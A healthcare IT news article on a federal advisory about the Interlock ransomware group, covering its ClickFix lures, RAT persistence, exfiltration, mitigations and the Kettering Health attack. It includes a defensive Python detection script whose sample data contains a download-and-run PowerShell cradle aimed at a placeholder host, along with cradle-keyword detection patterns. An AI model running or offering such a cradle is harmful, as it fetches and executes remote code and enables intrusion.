
Hospitals and health systems need to move quickly to protect against Interlock, a ransomware group targeting critical infrastructure by gaining remote access to networks through phishing scams that trick users into inadvertently downloading malware.
Interlock bad actors do this "under the guise of fixing an issue on the victim’s system," according to a July 22 joint advisory from the FBI, the U.S. Department of Health and Human Services, Homeland Security's Cybersecurity and Infrastructure Security Agency and the Multi-State Information Sharing and Analysis Center, or MS-ISAC.
WHY IT MATTERS
Interlock has recently been observed using the ClickFix social engineering technique to deploy remote access trojans, known as RATs, including "NodeSnake RAT," the agencies said in the joint advisory on Tuesday.
Once they gain access to a computer, the threat actors employ various methods to gain credentials and move laterally through networks, ultimately employing a double extortion where they exfiltrate data and then lock an organization's systems down.
"Interlock ransomware methods for initial access have previously disguised malicious payloads as fake Google Chrome or Microsoft Edge browser updates, though a cybersecurity company recently reported a shift to payload filenames masquerading as updates for common security software," the agencies said before providing a list of filenames and mitigations in the advisory.
There are notable similarities to tactics employed by Rhysida ransomware, but Interlock actors use a fake Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) to snare their victims.
The malicious CAPTCHA "contains instructions for users to open the Windows Run window, paste the clipboard contents and then execute a malicious Base64-encoded PowerShell process," the agencies said.
North American and European organizations in various sectors have experienced service disruptions as a result of Interlock ransomware exploits that leverage the persistent RATs living in a Windows Startup folder – activated every time a victim logs in.
In other instances, Interlock actors modify a Windows Registry key to run a "Chrome Updater" when a user logs in.
Once they escalate privileges in the network – by using AnyDesk, Cobalt Strike, PowerShell, ScreenConnect and more – Interlock threat actors will navigate to Microsoft Azure Storage accounts. They have been observed using Windows copy and file transfer tools to exfiltrate data.
Once locked out of their systems, victims are provided with a code to contact the group via the Tor browser and discuss a ransom.
To prevent Interlock ransomware, the agencies say that organizations should focus on proactive security measures like DNS filtering, web application firewalls and user training against social engineering. They recommend hardening systems through robust patching, multi-factor authentication, strong password policies and network segmentation.
After applying mitigations, the agencies recommend exercising, testing and validating security against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework referenced in the advisory.
To improve detection and recovery, organizations should ensure they have immutable offline backups, make use of endpoint detection and response tools, and continuously monitor for anomalous activity and unauthorized access.
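The ClickFix chain and the persistence mechanisms described above (an encoded PowerShell command pasted into the Run window, a RAT in the Startup folder, a "Chrome Updater" Run key) all leave artifacts that the continuous monitoring recommended here can catch. The following is an added example, not code from the advisory or from Healthcare IT News, showing how a defender might triage process-creation telemetry and autorun entries for those artifacts. The log records, registry values and file paths are constructed samples; "placeholder" names stand in for any real file or host name, and the detection rules are heuristics of this example rather than anything the agencies published.

```python
from __future__ import annotations

import base64
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class Finding:
    rule: str
    detail: str


def encode_powershell(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (Base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Matches -e / -ec / -enc / -EncodedCommand followed by a Base64 blob; -ep and
# -ExecutionPolicy do not match because the character after "-e" is neither c nor n.
ENCODED_FLAG = re.compile(r"(?i)(?<!\S)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")
# Keywords that indicate a download-and-run cradle once the payload is decoded.
CRADLE_KEYWORDS = ("iex", "invoke-expression", "downloadstring", "iwr", "invoke-webrequest")
# Autorun commands living in user-writable locations deserve a closer look.
USER_WRITABLE = re.compile(r"(?i)\\(?:appdata|temp|tmp|downloads|programdata|public)\\")
# Run-key value names that pose as a browser updater (the advisory cites "Chrome Updater").
FAKE_UPDATER = re.compile(r"(?i)(?:chrome|edge|browser).*updat")

# Constructed sample telemetry for this example, not taken from the advisory.
# Process-creation records:  parent image | child image | command line
SAMPLE_PROCESS_EVENTS = [
    "explorer.exe | powershell.exe | powershell -w hidden -ep bypass -enc "
    + encode_powershell("iwr http://placeholder.invalid/stage | iex"),
    "explorer.exe | powershell.exe | powershell -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1",
    "services.exe | svchost.exe | svchost.exe -k netsvcs",
]
# HKCU\...\CurrentVersion\Run values:  value name -> command (OneDrive is a legitimate
# AppData autorun and must not be flagged; only the fake-updater name plus a user-writable path is).
SAMPLE_RUN_VALUES = {
    "OneDrive": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    "Chrome Updater": r"C:\Users\alice\AppData\Roaming\placeholder\chrome_update.exe",
}
# Files found in the per-user Startup folder (constructed).
SAMPLE_STARTUP_FILES = [
    r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini",
    r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\placeholder_rat.exe",
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if the command line has none."""
    m = ENCODED_FLAG.search(cmdline)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_process_event(line: str) -> list[Finding]:
    """Flag encoded PowerShell launched from the shell (Run dialog) and download cradles."""
    parent, image, cmdline = (part.strip() for part in line.split("|", 2))
    if image.lower() != "powershell.exe":
        return []
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return []
    findings = []
    if parent.lower() == "explorer.exe":
        # ClickFix has the user paste into Win+R, so the child is spawned by explorer.exe, not a script host.
        findings.append(Finding("clickfix_run_dialog", f"encoded PowerShell from explorer.exe: {decoded!r}"))
    hits = [k for k in CRADLE_KEYWORDS if k in decoded.lower()]
    if hits:
        findings.append(Finding("encoded_download_cradle", f"decoded payload uses {hits}"))
    return findings


def check_autoruns(run_values: dict[str, str], startup_files: list[str]) -> list[Finding]:
    """Flag Run-key values posing as browser updaters and raw binaries dropped into Startup."""
    findings = []
    for name, command in run_values.items():
        if FAKE_UPDATER.search(name) and USER_WRITABLE.search(command):
            findings.append(Finding("run_key_fake_updater", f"{name!r} -> {command}"))
    for path in startup_files:
        # Legitimate Startup entries are normally .lnk shortcuts; a bare executable or script is worth triage.
        if path.lower().endswith((".exe", ".dll", ".bat", ".cmd", ".vbs", ".js", ".ps1")):
            findings.append(Finding("startup_folder_binary", path))
    return findings


def triage() -> list[Finding]:
    """Run every check over the constructed samples and return the findings in order."""
    findings: list[Finding] = []
    for line in SAMPLE_PROCESS_EVENTS:
        findings.extend(check_process_event(line))
    findings.extend(check_autoruns(SAMPLE_RUN_VALUES, SAMPLE_STARTUP_FILES))
    return findings


if __name__ == "__main__":
    for f in triage():
        print(f"[{f.rule}] {f.detail}")
```

In practice the process records would come from Sysmon event 1 or Windows Security event 4688 with command-line auditing enabled, and the autorun data from an EDR or an Autoruns export; the point of the example is that the decoded command, the explorer.exe parent and the user-writable autorun path are each cheap to check and together describe the behavior the advisory attributes to Interlock.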
THE LARGER TREND
Ohio-based Kettering Health dealt with an Interlock ransomware attack on its network on May 20. The attack limited access to patient care as Kettering canceled certain surgeries, brought radiation oncology treatments to a halt for a week, and shut down its call center and text messaging services.
The attack quickly led to a scam targeting patients, in which people claiming to be billing team members phoned patients to demand payments, forcing the health system to temporarily suspend billing activities.
Last year, the Chicago Health System Coalition said it believed that Interlock was aggressively targeting healthcare organizations. Then, researchers at Cisco's Talos Intelligence described in a November blog post how an Interlock threat actor conducting big-game hunting was present in a victim’s environment for approximately 17 days before dropping the ransomware payload.
ON THE RECORD
"The actors instruct victims to make ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the actors," the agencies said in the new federal advisory.
"The actors threaten to publish the victim’s exfiltrated data to their leak site on the Tor network unless the victim pays the ransom demand; the actors have previously followed through on this threat."
Andrea Fox is senior editor of Healthcare IT News.
Email: afox@himss.org
Healthcare IT News is a HIMSS Media publication.